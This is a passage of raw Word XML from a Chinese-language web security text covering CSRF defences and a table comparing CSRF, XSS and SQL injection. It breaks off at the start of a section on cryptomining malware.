        </w:rPr>
        <w:t>存入</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02699273" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随表单返回给客户端</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2723E865" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提交时验证</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否匹配</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27974163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 xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>双重</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B44383" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前端从</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取会话</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8EDC8B" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在请求头或参数中附带该值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AFA653" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务端对比两个值是否一致</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428C9239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3. SameSite Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D266E8" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Strict</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：完全禁止跨站携带</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C28FBA" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Lax</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：允许安全方法（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的跨站请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1083F3" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：允许所有跨站请求（需配合</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Secure</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A2CFA7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 xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>关键操作二次验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F05135C" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>敏感操作前要求重新认证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C47428" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA9042A" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>短信验证码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E118CBC" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生物识别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7250DB17" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CSRF vs XSS vs SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>注入：核心区别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F1F68C" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF vs </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XSS vs SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>注入：核心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15"/>
        <w:gridCol w:w="2618"/>
        <w:gridCol w:w="2544"/>
        <w:gridCol w:w="2467"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="3C05FF25" w14:textId="77777777" w:rsidTr="00501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8C0FA2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维度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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408B3A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CSRF</w:t>
            </w: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攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="143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E29ED96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XSS</w:t>
            </w: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攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="139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98C7234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SQL</w:t>
            </w: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注入攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="0CCC8FAA" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="687" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4D1A0881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rFonts w:cs="Times New Roman"/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cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>攻击目标</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1480" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7AC52370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利用用户身份执行操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1438" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="77ED7313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窃取用户数据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/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会话</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1395" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6B64959D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窃取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/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篡改数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="1C719F89" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="687" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1EB02854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rFonts w:cs="Times New Roman"/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利用点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1480" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6707E180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用户已登录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+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访问恶意网站</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1438" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3462D42D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网站存在未过滤的用户输入点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1395" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4E7292AC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用户输入拼接到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SQL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语句时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="498FF551" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="687" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4E021672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攻击位置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1480" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4123FEC9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跨站请求（不同域名）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1438" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1CF24A06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当前网站内执行恶意脚本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1395" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="160E9C54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服务端数据库操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="5557BEDD" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="687" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="32C3041C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核心防御</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1480" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7E817E49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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>CSRF Token + SameSite Cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1438" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="48D6A7BC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输出编码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 xml:space="preserve"> + CSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1395" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6DEDC2D1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参数化查询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 xml:space="preserve"> + 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输入过滤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="778797DA" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="687" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="224216B4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危害特点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1480" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5C6DB8E0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以用户名义执行操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1438" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="785A6022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客户端数据泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1395" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3E26F4BC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服务端数据泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27D971F2" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BF50C2E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关键区别：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E1348C" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用的是浏览器对</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的自动携带机制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A9D804" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用的是网站对用户输入的信任</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D106A4" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入利用的是数据库对查询语句的信任</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F89EB7" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>终端设备攻击与防御</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EDA3DA" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>挖矿病毒解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B3C613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工作原理（三步入侵）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C2A59D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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>感染入口：</w:t>
      </w:r>
    </w:p>
